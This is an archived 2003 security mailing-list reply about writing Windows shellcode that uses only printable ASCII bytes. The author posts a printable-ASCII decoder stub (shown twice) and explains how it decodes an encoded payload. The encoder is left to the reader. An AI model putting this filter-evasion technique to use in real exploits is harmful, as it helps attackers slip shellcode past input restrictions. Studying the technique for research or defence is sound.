martin rakhmanoff wrote: > Usually when coding exploits one needs to escape null bytes in shellcode. > To do this XOR is often used. My question is: is it possible to escape not > only null bytes but also non-ascii bytes? > In other words is it possible to have shellcode (for Windows 2000/XP/2003) > that consists of bytes with codes 0x21-0x7e? Here I'm sending our solution to the problem, we came to it after starting a small challenge to have some fun with some friends. This solution will somehow be enough for you. One of the other guys in the challenge (we were 4 total, if not 3) made a much better solution, without using anything but numbers and letters (I think). TY```T]Q\%GERA%(*).P^HPYQFFFF3Dw:+Dw:+Dw:+Dw:3E\3Dw61D76QXgeraBOO@T||lJAB@XXXXDABNLTTPE@@NXHXXEFIL\\L\GDBL\\X\LEEA@DDDEAAO@@@@ This code (also attached) assumes %edi is pointing to its first byte, and after that, it's a generic decoder (pretty much like an xor decoder) with the benefit of only using "ascii" characters, both in the decoding routing and the encoded part. Now, the encoder and reversing of it I both leave as exercise to the reader and hope to see discussed in this list :-) and, erm... be carefull with the encoder, it was what consumed most of my time when we wrote it. On the next email I'll be starting a different challenge, for which I still have no good answer, and furthermore, I think there is not generic answer, if there is one at all... (sounds challengien, eh?!) gera TY```T]Q\%GERA%(*).P^HPYQFFFF3Dw:+Dw:+Dw:+Dw:3E\3Dw61D76QXgeraBOO@T||lJAB@XXXXDABNLTTPE@@NXHXXEFIL\\L\GDBL\\X\LEEA@DDDEAAO@@@@
This archive was generated by hypermail 2b30 : Thu Jun 26 2003 - 10:12:00 PDT